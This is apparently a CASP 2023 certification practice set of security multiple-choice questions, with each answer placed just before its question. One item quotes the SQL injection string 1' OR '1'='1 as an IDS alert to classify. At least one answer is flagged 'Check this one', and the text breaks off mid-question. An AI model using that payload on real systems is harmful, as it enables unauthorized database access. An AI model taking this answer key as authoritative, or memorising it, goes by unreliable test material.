CASP 2023 with verified questions and answers

C A security program alerts you of a failed logon attempt to a secure system. On investigation, you learn the system's normal user accidentally had caps lock turned on. What kind of alert was it? A. True positive B. True negative C. False positive D. False negative A Your security policy calls for the company's financial data archive to have its confidentiality, integrity, availability, and accountability protected. Presently it's stored on two redundant servers protected by strong passwords and transport encryption. What additional control would achieve your security goals? A. A version management system that tracks all user accounts and revisions B. Full-disk encryption C. Regular data backups D. Two-factor authentication B You work for a contracting company closely aligned with the US federal government. Which organization's publications are likely to be most closely related to your security compliance standards? A. CIS B. NIST C. NSA D. W3C B, E Your internal network is protected by a Cisco firewall between the WAN and the internal network. While its not having any problems, your supervisor suggests installing a Fortinet firewall between the Cisco firewall and the trusted LAN in order to create a new DMZ. Which security principles does this promote? A. Availability B. Defense in depth C. Security by design D. Security by obscurity E. Vendor diversity C You've found signs of unauthorized access to a web server, and on further review the attacker exploited a software vulnerability you didn't know about. On contacting the vendor of the server software, you learn that its a recently discovered vulnerability, but a hotfix is available pending the next software update. What kind of vulnerability did they exploit? Choose the best response. A. APT B. Structural C. Unknown D. Zero-day A Through your organization you've seen a pattern of attacks of different types. Login attempts, malware, phishing emails, application exploits, and so on. None of the individual techniques are that exotic or hard to stop, but they're seemingly endless and most seem to be the work of the same group of attackers. What kind of threat is this? Choose the best response. A. APT B. Structural C. Unknown D. Zero-day D For your new security consulting position, you're helping a hospital secure its HR database. It includes employee records such as contact information, employment history, and payment data. What would this information be classified as? Choose the best response. A. IP B. PCI C. PHI D. PII A You've been tracking a new form of malware on your network. It seems to primarily work by attacking web browsers when they visit certain external website. What parts of the network should your analysis focus on? Choose the best response. A. Endpoints B. Network Appliances C. SCADA devices D. Servers 5,2,1,4,6,3 Order the steps of a complete risk assessment. 1. Analyze business impact 2. Conduct a threat assessment 3. Create a mitigation strategy 4. Evaluate threat probability 5. Identify assets at risk 6. Prioritize risks B You're shopping for a new A/C unit for your server room, and are comparing manufacturer ratings. Which combination will minimize the time you'll have to go without sufficient cooling? Choose the best response. A. High MTBF and high MTTR B. High MTBF and low MTTR C. Low MTBF and high MTTR D. Low MTBF and low MTTR A A critical database is prone to occasional corruption issues due to application flaws. The corruption doesn't actually cause data loss, but it interrupts service and takes time to repair. Last year it happened four times, and the service disruptions caused a total of $120,000 in revenue loss. Using the past year for an estimate, if you include this threat into a quantitative risk assessment, what would the SLE be? Choose the best response. A. $30,000 B. $40,000 C. $120,000 D. $480,000 C You're performing a FIPS 199 impact analysis of a DBMS containing two separate databases. If SC_DB1 = { (confidentiality, MODERATE), (integrity, MODERATE), (availability, HIGH) } and SC_DB2 = { (confidentiality, LOW), (integrity, HIGH), (availability, LOW) }, how would you rate the impact for the DBMS itself? Choose the best response. A. { (confidentiality, MODERATE), (integrity, MODERATE), (availability, HIGH) } B. { (confidentiality, LOW), (integrity, HIGH), (availability, LOW) } C. { (confidentiality, MODERATE), (integrity, HIGH), (availability, HIGH) } D. { (confidentiality, MODERATE), (integrity, MODERATE), (availability, MODERATE) } A,B,E A multinational corporation is integrating multiple business units into a unified information system. Which of the following does it need to perform in order to do so? Choose all that apply. A. Analyze the benefits and drawbacks of centralizing network and security rules. B. Apply a unified standard to information sharing between business units. C. Ensure that all business units meet the same regulatory compliance standards. D. Ensure that all business units have compatible high level policies. E. Maintain independent security standards between business units wherever possible. E Your company has long maintained an email server, but it's insecure and unreliable. You're considering just outsourcing email to an external company who provides secure cloud-based email services. What risk management strategy would this represent? Choose hte best response. A. Risk acceptance B. Risk avoidance C. Risk deterrence D. Risk mitigation E. Risk transference A What element of your risk mitigation strategy helps keep future additions to your network from introducing new security vulnerabilities? Choose the best response. A. Change management B. Incident management C. Security Audits D. Technical controls A,B,E Your organization has a legacy application which uses 3DES encryption to communicate with a variety of remote systems, but newly enacted regulatory requirements specify a minimum of 128-bit AES for such links. Replacing it will be a big project, and for logistical and budgetary reasons it's certainly not doable this year. What information would be useful in requesting an exemption? Choose all that apply. A. A time frame in which you can replace the legacy system B. Additional security controls you can use to mitigate risk until AES encryption can be deployed C. Copies of corporate policies which specified 3DES for the system D. Reasons why AES encryption is not actually necessary for your security needs E. Technical reasons why AES encryption cannot be deployed at this time D Outages in a critical system cost your organization $250,000 in revenues a year. You're evaluating a high availability solution that should reduce outages by 80%. It will cost $150,000 to implement, and $50,000 per year to operate and maintain over the next five years. What is the expected TCO for the high availability solution? Choose the best response. A. $80,000 B. $150,000 C. $200,000 D. $400,000 B "Outages in a critical system cost your organization $250,000 in revenues a year. You're evaluating a high availability solution that should reduce outages by 80%. It will cost $150,000 to implement, and $50,000 per year to operate and maintain over the next five years." For the same solution , what is the estimated ROI? Choose the best response. A. 25% B. 150% C. 212.5% D. 400% B,D,E Which of the following would make useful KRIs during a risk analysis process? Choose all that apply. A. Average time required to complete an incident response report B. Cybersecurity funding relative to industry average C. System availability D. Testing rates for data backups E. Time required to implement security patches C,D You need to deploy a new web application firewall, and you're comparing different solutions according to what kinds of rules they can process, how many requests they can handle per second, how much they affect website response time, and how much training it takes for administrators to design and apply rules. What kind of metrics are not currently included in your comparison? Choose all that apply. A. Capability B. Latency C. Maintainability D. Scalability E. Usability D The last security audit showed that your firewall and IDS rules don't reflect the latest threats. What would be the most efficient way for you to fix the problem? Choose the best answer. A. Attend InfoSec World B. Browse the deep web C. Revise incident response processes to add detected threats to rule lists D. Subscribe to a threat feed B,E After finding some threat intelligence sources to improve your security systems, you still want to increase your readiness against zero-day threats. What technologies might be promising in doing so? Choose the two best responses. A.Big Data B.Machine learning C.RFCs D.Social media E.Threat modeling B You implemented a new network service based on an IETF Proposed Standard, and now the protocol it uses has been updated to an Internet Standard. You're comparing the updated RFC to the Proposed Standard you used. At a glance, what would tell you that you don't need to make any changes? Choose the best response. A.RFC and STD unchanged B.RFC unchanged, new STD added C.RFC and STD both change D.Errata marking the Proposed Standard as accepted in full. C You're providing security consulting for a software development team. Company policies suggest using OWASP guidelines as a primary source for application development. What threat modeling methodology should you recommend for the project? Choose the best response. A.OCTAVE B.PASTA C.STRIDE D.Trike B Your supervisor wants a methodical way to find missing or misconfigured security controls on your production network, but it's unfortunately full of critical services fragile enough to have problems when they receive excessive or non-standard traffic. This makes it important to use the least intrusive method possible. Which of the following would you recommend? Choose the best response. A. A black box penetration test B. A credentialed vulnerability scan C. A non-credentialed vulnerability scan D. A white box penetration test C,D,E You've been charged with overseeing a vulnerability scan. Which of the following actions are you likely to perform? Choose all that apply. A. Bypassing security controls B. Exploiting vulnerabilities C. Finding open ports D. Identifying vulnerabilities E. Passively testing security controls B While conducting a vulnerability assessment, you're given a set of documents representing the network's intended security configuration along with current network performance data. Which type of review are you most likely to perform? Choose the best response. A. Architecture review B. Baseline review C. Code review D. Design review C You're instructed to assist outside penetration testers by giving them complete documentation on your network and its configuration. What kind of test are they performing? Choose the best response. A. Black box B. Black hat C. White box D. White hat B Once a third-party penetration test begins, it's your job to secure the network and stop attacks before the penetration testers achieve their goal. What team are you on? Choose the best response. A. Black team B. Blue team C. Red team D. White team B,D While conducting a penetration test you've exploited an application flaw to get temporary access on a proxy server. Part of your goal is to use that server as a pivot. Which of the following steps directly achieve that goal? Choose all that apply. A. Creating a new account you can log in from again B. Creating a tunnel through the proxy server to the internal network C. Establishing administrative credentials D. Running a network scan from that server E. Searching through data folders on the server A The CIO wants you to plan a vulnerability scanning program. It's essential that it find as many vulnerabilities as possible while limiting excess network traffic. What type of solution would best suit your needs?Choose the best response. A. Agent-based credentialed scanning B. Agent-based non-credentialed scanning C. Agentless credentialed scanning D. Agentless non-credentialed scanning C Your SCAP-compliant vulnerability feed includes a long list of uniquely defined vulnerabilities. Which SCAP component is used to actually identify each vulnerability? Choose the best response. A. CCE B. CPE C. CVE D. OVAL C You're asked to generate a vulnerability report that shows the number and types of vulnerabilities and fixes you've encountered every month in the last year. What kind of report would that be? Choose the best response. A. Change report B. Scope report C. Trend report D. Workflow report A After running a vulnerability scan you learn that a number of the identified vulnerabilities don't actually exist on the system. What should you do? Choose the best response. A. Mark them as false positives B. Mark them as false negatives C. Mark them as low criticality D. File them as an SLA D Your latest vulnerability scan uncovered a serious and time-critical vulnerability, but you can't fix it immediately because the company change management process mandates a review period before making the necessary changes. What kind of remediation problem are you having? Choose the best response. A. Business process interruption B. Degrading functionality C. MOU D. Organizational governance C Your company is developing an application a private US-based hospital will use to give patients online access to their medical records. Regardless of what other data the application handles, what kind of compliance do you already know you need to research? Choose the best response. A. FERPA B. FISMA C. HIPAA D. PCI-DSS B,C A US government agency is planning to migrate some of its internally hosted data to a cloud-based service, and you need to make sure the proposed vendor can meet the same security requirements as the current solution. What are you currently practicing? Choose all that apply. A. Due care B. Due diligence C. FISMA compliance D. GDPR compliance E. GLBA compliance C Which framework incorporates five core publications forming a Service Lifecycle? Choose the best response. A. COBIT 5 B. ISO 27000 C. ITIL D. NIST CSF C Your company is contracting with a US Federal agency, and you have to make sure your solutions are compatible with their policy framework. Which framework are you most likely to become familiar with? Choose the best response. A. COBIT 5 B. ISO 27000 C. NIST 800 series D. NISF CSF D Coming in late to a meeting, you hear that one new cybersecurity framework under evaluation bases everything around the Architecture Development Model. What framework is likely being discussed? Choose the best response. A. COBIT 5 B. ITIL C. ISO 27001 D. TOGAF C You're working for an industrial equipment manufacturer that's in the process of developing closer ties with a key distributor. At the moment, the goals are to ensure that you're keeping open communications and adopting common standards in case you want to develop a more formal partnership later; for the time being, there won't be any legally binding agreement between you. What kind of policy document are you likely to end up designing? Choose the best response. A. BPA B. ISA C. MOU D. SLA B Your company has decided to outsource an application rather than develop it in-house. While you have a fairly strong idea of the business goals and security requirements it must satisfy, you don't know any off the shelf solution that would meet them. What kind of request should you assemble in order to begin the procurement process? Choose the best response. A. RFI B. RFP C. RFQ D. RMF A After a security incident due to a vulnerable mobile device, you're creating a formal configuration checklist that must be applied to all Android devices joined to the enterprise network. What term would best describe the policy document? Choose the best response. A. Benchmark B. Guideline C. Standard D. Procedure B Your company has signed a BPA with a business partner. What most likely isn't a part of it? Choose the best response. A. How liability is shared for a loss of shared assets B. Technical requirements for secured data connections between the two companies C. What happens to informational assets when the agreement is dissolved D. Who is responsible for maintaining informational assets A,B,E You're entering in a partnership with another organization that involves data sharing. What do you need to do before you enact it? Choose all that apply. A. Develop mutual review processes B. Establish data ownership rules C. Research adverse action guidelines D. Retire your existing privacy policy in favor of a jointly developed one E. Review applicable regulations and customer agreements to see what restricts data sharing in this case C What order are the steps of the Deming cycle? Choose the best response. A. Check, Plan, Act, Do B. Check, Plan, Do, Act C. Plan, Do, Check, Act D. Plan, Check, Do, Act B Your company just created the root certificate for its CA. Its private key won't be needed very often, so it will be stored in a safe when not needed. What security procedure could you use to make sure that no single employee can open the safe and get the key? Choose the best response. A. Cross training B. Dual control C. Manual review D. Separation of duties B During some building renovations, your facility has a lot of outside contractors coming and going while regular personnel handle sensitive documents. What kind of policy might help you reduce the chance of a data breach? Choose the best response. A. AUP B. Clean desk policy C. Dual controls D. Separation of duties B,D You recently discovered theft by an employee who would process and approve fraudulent business transactions with an external accomplice. The scheme had been going on for two years, since no one else was in a position to notice a series of small inappropriate transactions. Management wants new policies designed to prevent similar incidents in the future. What principles would directly further that goal? Choose all that apply. A. Clean desk policy B. Job rotation C. Least privilege D. Mandatory vacation E. Recertification B,E What are the benefits of a job rotation policy? Choose all that apply. A. Allows employees to discover each other's mistakes in multi-step processes B. Helps detect fraudulent activity over time C. Minimizes permissions given to any one employee D. Prevents data loss E. Trains employees more broadly D For regulatory compliance, you're required to use unique user IDs for all computer access, but there's one critical isolated system that doesn't actually support user-based access and must be used by multiple people. What might be a valid compensatory control? Choose the best response. A. Enabling system logging on that computer B. Encrypting all connections from that computer C. Placing a firewall between that computer and the network D. Using security cameras and a logbook to track access to the computer itself B A third-party team is going to formally examine your organization's overall security practices in order to make sure they meet regulatory compliance goals. Your organization may be fined if it fails. What would this verification process best be called? Choose the best response. A. Assessment B. Audit C. Certification D. Evaluation D You're using CMMI as a maturity model for application development. What maturity level are you at if you've just established organized testing and evaluation of security processes and controls for the application? Choose the best response. A. Defined B. Managed C. Optimizing D. Qualitatively Managed B What kind of security training is most important for a company executive? Choose the best response. A. Identifying malware symptoms B. Overall awareness of the organization's assets and threats to them C. Recognizing social engineering attacks D. Regular updates on evolving network threats D You're reviewing role-based training materials for a FISMA-compliant government agency. Who are you most likely to submit your feedback to once you're done? Choose the best response. A. The CCO B. The CIO C. The CISO D. The SAISO A Users should have both permission and need to access sensitive data, whether technically able to or not. True or false? A. True B. False D What kind of employee is most likely to need extra training about social engineering attacks? Choose the best response. A. Department manager B. Maintenance technician C. Network administrator D. Receptionist B On reviewing a software development project you've found that a novice programmer accidentally was storing passwords in plaintext. Fortunately the project hasn't gone into production yet, but what sort of cryptography should you specify for password storage? Choose the best response. A. Asymmetric encryption B. Hashing C. One-Time Pad D. Symmetric encryption 4,1,3,2 Order the following encryption ciphers from weakest to strongest. 1. 3DES 2. AES 3. Blowfish 4. DES C You had a network protocol configured to use a high-performance stream cipher, but some new flaws were found in your RC4 implementation and the CISO recommends moving to AES. Unfortunately the older system doesn't support AES acceleration, so performance is a possible bottleneck. What block cipher mode would both maintain high security and high performance? Choose the best response. A. CBC B. CFB C. CTR D. ECB B What asymmetric algorithm uses complex new mathematical approaches to create relatively short but very secure and high-performance keys? Choose the best response. A. DH B. ECC C. RIPEMD D. RSA C You've been researching a data breach in a system that transmits network data encrypted with a series of temporary session keys based on a long-term static key. The static key was compromised, then changed almost immediately, but you believe the attackers were able to use it to decrypt previously captured ciphertext. What encryption quality could you use to prevent similar issues in the future? Choose the best response. A. Elliptic curve cryptography B. Message authentication C. Perfect forward secrecy D. Steaganography B You're instructed to employ a cryptographic process that gives integrity, authenticity, and non-repudiation. What method would best suit those needs? Choose the best response. A. Diffie-Hellmann key exchange B. Digital signature C. Hashing D. HMAC D You've received an assortment of files along with accompanying hashes to guarantee integrity. Some of the hash values are 256-bit and some are 512-bit. Assuming they all use the same basic algorithm, what might it be? Choose the best response. A. MD5 B. RIPEMD C. SHA-1 D. SHA-2 A,C What is true of a digital certificate, but not true of a digital signature? Choose all that apply. A. Has a valid starting and ending date B. Proves the authenticity of a message C. Proves the authenticity of a person or system D. Provides non-repudiation E. Requires both an asymmetric key pair and a hashing algorithm D You want a purchase a certificate that will apply to , , and an upcoming server you haven't finalized a host name for yet. What kind of certificate is the best fit for your needs? Choose the best response. A. EV B. Qualified C. SAN D. Wildcard D You want a method to find revoked certificates without excessive network transfers or outdated results. What technology can you use? Choose the best response. A. ASN.1 B. CRL C. CSR D. OCSP A For e-discovery requirements you need to be able to decrypt any official communications used within your organization. This is a potential problem with certificate-based encryption systems that use private keys assigned to individual employees. What PKI method could you use to bring the organization into compliance? Choose the best result. A. Key escrow B. Key recovery C. PKI hierarchy D. Revocation C What certificate formats commonly use the web of trust model? Choose the best response. A. ASN.1 B. Bridge C. OpenPGP D. X.509 B An attacker's gotten a fraudulent certificate attesting to be for your application server and is planning to intercept your transactions in a man-in-the-middle attack. The certificate hasn't been revoked yet, but what technology could still let you know something is wrong? A. Escrow B. Pinning C. OCSP D. Stapling C On an IPsec VPN, what protocol negotiates security associations? Choose the best response. A. AH B. ESP C. IKE D. L2TP A,B,D What secure protocols add SSL/TLS security to protocols which were insecure on their own? Choose all that apply. A. FTPS B. HTTPS C. SFTP D. SNMPv3 E. SSH C You have an application layer firewall that isn't very useful because so much of the traffic you want to inspect has TLS encryption. What kind of security technology could you use to monitor that traffic? Choose the best response. A. Split tunnel B. SSL accelerator C. SSL decryptor D. VPN concentrator D You're setting up NAS file sharing, and want a protocol that allows Kerberos authentication and AES-HMAC signing while maximizing compatibility. Which protocol is best suited to your needs? A. NFSv3 B. NFSv4 C. SMBv2 D. SMBv3 C,D A policy calls for specific folders on a computer to use file-based encryption, but you need to write guidelines recommending specific technologies for use in your mixed Windows/Linux environment. What encryption tools should you recommend? Choose all that apply. A. Bitlocker B. dm-crypt C. eCryptFS D. EFS E. SED D Three virtual machines are running on the same physical server, and each controls a logical data partition on the same physical disk. You want to protect all three with encryption. What method gives strong but flexible protection to your data? Choose the best response. A. Back all encryption keys up to a USB drive B. Encrypt the entire physical disk C. Replace the drive with a self-encrypting disk D. Separately encrypt each logical partition D What cryptographic tool is commonly built into a motherboard? A. FDE B. DLP C. HSM D. TPM B,E Your company is completely overhauling its ERP systems, but due to the nature of your business it needs a lot of customized development. Management wants the new solution to be "standards-compliant and secure" but sometimes that's easier said than done. Which of the following would you recommend when advising the development team? Choose all that apply. A. Choose de facto standards only when de jure standards are unavailable B. Choose de jure standards only when de facto standards are unavailable C. Choose open standards where possible because they are free to use D. If an outdated standard is at odds with best security practices, propose adhering strictly to the standard E. If an outdated standard is at odds with best security practices, propose adding compensating controls A,E You're securing a network that was designed with resilience in mind. Critical services are distributed across multiple locations, using different host types and software to reduce the impact of any single event. The problem is that the pieces don't work very well together and the whole is hard to manage. Without fundamentally removing the resilience goals of the network, what design steps can you recommend to integrate the network? Choose all that apply. A. Deploy a CMDB for change management and incident response B. Deploy a CMS for central management C. Implement high availability systems D. Install redundant storage to improve data persistence E. Redesign component interfaces using SOA principles D You've been instructed to examine the code of an application before using it, in order to make sure it contains promised security features and doesn't contain any hidden features. It's closed source, and the manufacturer won't share the code with you. How could you best examine code in a human-readable format? Choose the best response. A. Consult OEM documentation B. Monitor the application closely in a sandbox environment C. Perform a core dump while running the application in a VM D. Use a decompiler on the executable file B,C,E To reduce the labor costs and security risks of server provisioning and deprovisioning, your datacenter is moving to a more flexible and automated virtualization infrastructure. Which recommendations and security risks should you list in your evaluation of the project? Choose all that apply. A. As long as a server's security impact has been evaluated thoroughly on provisioning, it's safe to repurpose it without further evaluation. B. Servers should not be deprovisioned until administrators have verified their removal won't impact business operations C. Virtual servers must be documented as thoroughly as physical servers. D. Virtualization makes it less likely you'll leave data remnants during the deprovisioning process. E. Virtualization makes it more likely you'll permanently delete valuable data during the deprovisioning process. A,C,D While developing a web application, you're defining security requirements. Which of the following would be valid non-functional requirements? Choose all that apply. A. Ability to maintain 99.99% uptime B. An online password reset page C. Data sanitization following all user input D. HIPAA-compliant protection of all PHI E. Protection from web application attacks A,C You're designing data sanitization procedures for each type of media used in your organization, and you've been instructed to use physical degaussing when appropriate. What types of media can the degausser securely sanitize? Choose all that apply. A. Backup tapes B. CDs and DVDs C. Hard drives D. Paper documents E. SSDs A,B You're using a new "big data" platform to manage a large collection of customer data and public records. In addition to the list of security controls the CISO ordered you to investigate, the CPO wants to know how the transition might affect privacy concerns. Which of the following should you examine, from either a regulatory compliance or business ethics standpoint? Choose the two most likely concerns. A. Whether data aggregation features assemble identity information that could be classified as PII B. Whether data storage and access falls within multiple jurisdictions covered by different privacy laws C. Whether the less automated nature of big data puts customer data under more personal scrutiny D. Whether the nature of the big data platform makes it impossible to assign a privacy officer A Your organization has a critical database full of customer PII, and a new employee was just authorized to use it. How would you best describe the role of the system administrator who configures user permissions in the database software? A. Data custodian B. Data owner C. Data steward D. Privacy officer A Your datacenter's Fibre Channel LAN hasn't been meeting availability and performance requirements due to network connectivity problems. What features could you explore to boost availability? Choose the best reply. A. Active/active multipathing B. Deduplication C. LUN masking D. Root squashing A,C Implementing a SAN has boosted storage performance and flexibility, but made it hard to compartmentalize sensitive data. You want hosts in different security zones to connect to the same SAN, with each host only able to communicate with storage devices in its own zone. What changes should you make? Choose all that apply. A. Create VSANs for each zone B. Deploy a separate NAS for each zone C. Enable LUN masking D. Switch from Fibre Channel to iSCSI E. Use target-based deduplication C Your facility is in a flood prone area, and the CEO wants a plan that will allow you to move operations to a temporary site in the event of flooding. What document will definitely need to be revised? Choose the best response. A. BCP B. BIA C. COOP D. DRP D Which document is a business most likely to have more than one of? Choose the best response. A. BCP B. BIA C. COOP D. DRP D What began as revising flood preparedness procedures has led to a complete evaluation of how to maintain business operations in the wake of a catastrophic storm. As part of the process, the CISO wants to conduct a "structured walkthrough." What kind of test would this be? Choose the best response. A. Checklist test B. ISCP C. Simulation test D. Tabletop exercise A,C,D Which of the following RAID levels incorporates disk striping? A. RAID 0 B. RAID 1 C. RAID 5 D. RAID 10 A,E A critical server uses a RAID 5 array for its primary storage, but new security guidelines recommend retiring and replacing all RAID 5 installations. Performance isn't a major concern, but you'd like to reduce cost. What is the problem with the current system, and what replacement should you use? Choose one of each. A. RAID 5 arrays are prone to failure during rebuild processes B. RAID 5 has no redundancy features C. RAID 5 provides low capacity for a given number of disks D. You should implement RAID 1 E. You should implement RAID 6 F. You should implement RAID 10 C You have a critical database server that constantly backs its files up to the cloud, but its software environment is so finicky that if it encountered a critical failure it would take a long time to get it working again. How would you describe your recovery plan for that service? A. High RPO and high RTO B. High RPO and low RTO C. Low RPO and high RTO D. Low RPO and low RTO A Clustering is similar to load balancing, but tends to use tighter integration between redundant systems. True or false? A.True B.False A Your company rents a spare server room in a secondary location. It has all necessary hardware, software, and network services, and you just need to load the latest backups to get it in operation. What is it? Choose the best answer. A. Hot site B. Hot spare C. Cold site D. Cold spare C In terms of time, how does a differential backup plan generally differ from an incremental backup plan? A. It's quicker both to create backups and to restore data B. It's quicker to create backups, but slower to restore data C. It's slower to create backups, but quicker to restore data D. It's slower both to create backups and to restore data D What backup type might require specific operating system support? Choose the best response. A. Differential B. Full C. Incremental D. Snapshot A You're deploying a new Linux server. It will run a sensitive process which, according to policy requirements, must operate in an encrypted secure enclave so that even a compromised driver or kernel can't view or interfere with it. What security step will most directly accomplish this goal? Choose the best response. A. Configure Intel SGX for the process B. Enable SELinux C. Sign the process and add it to the UEFI allowed signature database D. Use the TPM's remote attestation feature A,D As part of upgrading and reconfiguring a Linux server, you've switched to a distribution that has Security Enhanced Linux installed by default. What benefits can you expect from the upgrade? Choose all that apply. A. Ability to restrict root permissions B. Direct compatibility with Windows NT ACLs C. Improved firewall and HIPS D. MAC enforcement throughout the operating system E. Verified Evaluation Assurance Level 3,5,2,4,1 Your Active Directory system applies group policies on several levels, so sometimes it's hard to be certain exactly which apply to a given computer. One server has overlapping policies applying from five GPOs, so you're making a priority list for administrators to keep in mind when making policy changes. Order the following GPOs from 1 to 5, where 1 overrides all others. 1. Child OU (SQL) 2. Domain () 3. Local server () 4. Organizational unit (Servers) 5. Site (North Central) C A factory production line is controlled by specialized expansion cards on an old PC. Compatibility with those cards and their control software requires an outdated operating system that's no longer receiving security updates. What is the most important step you should take to ensure the system's security? Choose the best response. A. Apply heavy monitoring to the system B. Design user procedures to compensate for weak operating system security C. Place it on an isolated secure network D. Install the most advanced host-based firewall supported by the operating system C Security analysts keep discovering unauthorized software on a secure network. While it can indirectly compromise security, the software isn't actually malicious and antivirus software doesn't block it. Management wants a solution that can prevent software from running unless it's on the approved list. What method will get the best results? A. Application blacklisting B. Application sandboxing C. Application whitelisting D. Trusted execution environments A A number of employees, including some administrators, have been tricked into installing fraudulent software. One recent attack you heard about was a modified Ethernet driver that reports on network activities. What security control is intended to protect against such an attack? Choose the best response. A. Code signing B. Firewall C. HIDS D. Trusted hardware D What potential security risk does an SD card pose that a USB thumb drive does not? Choose the best response. A. Data exfiltration B. Malware C. Photographs of sensitive areas D. Wireless attacks D As your organization moves toward a more unified mobile device policy, an administrator mostly familiar with Active Directory asks if there is a way to centrally manage security policies like Group Policy objects. What kind of technology do you recommend? Choose the best answer. A. Asset tracking B. BYOD C. GPS D. MDM C,D,F You're working with a team to develop a new mobile device policy for the contractors that frequently come and go from your company. While contractors and other employees use mobile devices to store sensitive data and PKI certificates used for authentication, they much prefer to use their own devices vs. a company-issued model. At the same time, with so many devices on the market, IT staff doesn't want to support every possible option. For contractors in particular, easy onboarding and offboarding is desirable. What deployment model and security features should you include in the policy? Choose all that apply. A. Establish a BYOD model B. Establish a COPE model C. Establish a CYOD model D. Distribute certificates with SCEP E. Secure PKI certificates with tokenization F. Use containerized data storage B,D What are important security steps on all mobile devices? Choose all that apply. A. Configuring antivirus software B. Configuring remote backup features C. Installing a firewall app D. Regularly applying operating system updates E. Using biometric authentication B What kind of policy governs removal of sensitive data and credentials when a user device is no longer used for company business? A. Asset tracking B. Offboarding C. Onboarding D. Storage segmentation A A critical vulnerability just hit the news - it allows an attacker to compromise mobile devices through several popular models of fitness tracker. Rather than take any chances, you've decided to use MDM to block company smartphones from connecting to such trackers until you've verified that no employees use affected models. What protocol do you need to disable? Choose the best response. A. ANT B. GSM C. NFC D. SATCOM C What model would describe a cloud accounting service? Choose the best response. A. IaaS B. PaaS C. SaaS D. SDN D While your organization has been virtualizing a wide range of physical hardware, one challenge is a high security network with software that makes heavy use of a hardware cryptoprocessor for RNG functions as well as key storage and remote attestation backed by a hardware root of trust. What feature could you use to virtualize these functions? A. HCI B. SDN C. VDI D. vTPM B You're helping a software development team choose a secure cloud-based solution. They want to develop their own custom web applications, but prefer the development environment itself to be provided by the hosting service. What kind of service model should you evaluate? Choose the best response. A. IaaS B. PaaS C. SaaS D. Any of the above C What kind of virtualization relies on a "master image?" Choose the best response. A. Bare metal B. Container C. Non-persistent VDI D. Persistent VDI D Your organization has decided to outsource a number of IT services to a cloud provider. They're hosted outside your enterprise network, but you want to centrally manage all authentication, encryption, activity logging, and other security policies for connections between local computers and the cloud. What security solution would address these issues? A. On-premise policies B. Private deployment C. Security as a Service D. Security broker A An attack on your web application began with a long string of numbers sent to a field that's only supposed to hold a four-digit variable. What kind of attack was it? Choose the best response. A. Buffer overflow B. Integer overflow C. LDAP injection D. XSRF D,E You're working with the red team in a gray box penetration test against a set of web application servers. According to your research of provided documentation and initial reconnaissance, the network protocols and web servers themselves seem to be well-hardened, but you think the back-end database systems might have some vulnerabilities. What attacks should the rest of the team use to reach past the web servers and target the databases? Choose all that apply. A. Command injection B. Cross-site scripting C. Session hijacking D. SQL injection E. XML injection C, Check this one An outside attacker exploited a web application vulnerability to gain elevated privileges and alter data for other users. Normally authorization controls would prevent such an action. As you review the access logs, none of the individual requests sent by the attacker were unusual.. What kind of vulnerability should you look for in the application? Choose the best response. A. Buffer overflow B. Injection C. Race condition D. Request forgery C An IDS sends you an alert with a form input to a web application. When you view the packet, the form input itself reads 1' OR '1'='1. What kind of attack does this most likely indicate? Choose the best response. A. Buffer overflow B. Cross-site scripting C. Injection D. Integer overflow A,C You're hardening your web application against cross-site scripting. The lead developer assures you that with the new input sanitization routines the front-end server won't allow executable scripts to be stored in the database. What kind of XSS attacks might still affect your users? Choose all that apply. A. DOM based B. Persistent C. Reflective D. XSRF B,D,F For an upcoming project your team is trying to decide between a SOAP and RESTful development approach. From a security and maintenance perspective, what advice can you give them? Choose all that apply. A. REST allows more powerful security features B. REST is generally fast and scalable C. REST requires a strict XML implementation D. SOAP allows more powerful security features E. SOAP is generally fast and scalable F. SOAP requires a strict XML implementation A,E The developers of an application have decided that the first release to users will have limited core functions, and new functionality will be added through a succession of small incremental releases until the product is mature. As a security consultant, your goal is to make sure security remains a goal through each successive release. What development model should the team use, and what challenge will there likely be as a consequence of that model? Choose one of each. A. Agile B. Spiral C. Waterfall D. Initially chosen security requirements may change before deployment E. It will be more difficult to maintain accurate documentation through the process F. The model has a lot of management overhead, especially for a simple project A,C,E You're reviewing a web application. Which of these features are security warning signs? Choose all that apply. A. Input errors are logged and clearly displayed to users in full detail. B. The web server and database software are on separate physical servers, both similarly secured. C. Input validation is performed more rigorously on the client side than the server side. D. The HTTPOnly flag is set on session cookies. E. Secret cookies are used to prevent XSRF attacks. A You're researching a recent XSS attack against a web application. The developer showed you the JavaScript code used to sanitize and validate input in the browser; even if you're not a coder, it seems like it would have prevented the attack. What is the most likely reason the web application was vulnerable? Choose the best response. A. Client-side validation can be easily bypassed. B. Input validation doesn't reliably protect against XSS attacks. C. Server-side validation can be easily bypassed. D. The attacker performed an injection attack to bypass input validation. B You've just rebuilt the back end of an application to boost server performance, and you're ready to test the new version. What kind of test would discover if the changes caused any problems with existing security features? Choose the best response. A. Protocol Fuzzing B. Regression test C. Stress test D. User acceptance test D The development team has just created a control flow graph for a new application. What stage of development are they in? Choose the best response. A. Manual code review B. Provisioning C. Security requirements definition D. Static code analysis A,D SSH connectivity through the network to the server at 10.10.200.5 is inconsistent, so you're evaluating router ACLs. Which of the following are likely to cause connectivity problems? Choose all that apply. A. A rule that denies access to port 22 on all networks followed by a rule that permits all SSH traffic to the 10.10.200.0 subnet. B. A rule that denies access to port 22 on the 10.5.100.0 subnet followed by a rule that permits access to port 22 on the 10.10.200.0 subnet C. A rule that permits access to port 22 on the 10.10.200.0 subnet followed by a rule that denies access to port 22 on all subnets. D. Deny any any at the beginning of an ACL E. Deny any any at the end of an ACL B You manage a public-facing server that's intermittently hammered by massive DDoS attacks. It doesn't host any critical services, but the traffic volume degrades other network performance. What's the easiest and most reliable way to protect overall network functions when the next attack occurs? Choose the best reply. A. Configure stateful filtering rules B. Set up a destination-based RTBH C. Set up a source-based RTBH D. Subscribe to a scrubbing service A You're configuring a router, and want it to check the source properties of incoming traffic before passing it on. What will this require? Choose the best response. A. Configuring ACLs B. Configuring routing tables C. Either would have the same effect D. Only a fully featured firewall can do this. C What DMZ topology is displayed? Choose the best response. (See page 393 for Image) A.Bastion Host B.Dual firewall C.Three-homed firewall D.UTM firewall B,E You've been using a dual stack configuration to transition the network to IPv6, but constantly changing IPv6 addresses are making it hard to manage devices, and IPv6 connectivity is sometimes inconsistent between hosts you know support it. What changes might improve the situation? Choose all that apply. A. Blocking IPv6 multicast traffic B. Disabling IPv6 privacy extensions on hosts C. Disabling SEND D. Enabling IPv6 privacy extensions on hosts E. Ensuring all routers support IPv6 C You're receiving a lot of unauthorized network scans using methods carefully designed to get by existing firewall rules. What device or feature would be the best way to recognize and block those scans? Choose the best response. A. Application layer firewall B. IDS C. IPS D. Stateful firewall C You want to take some 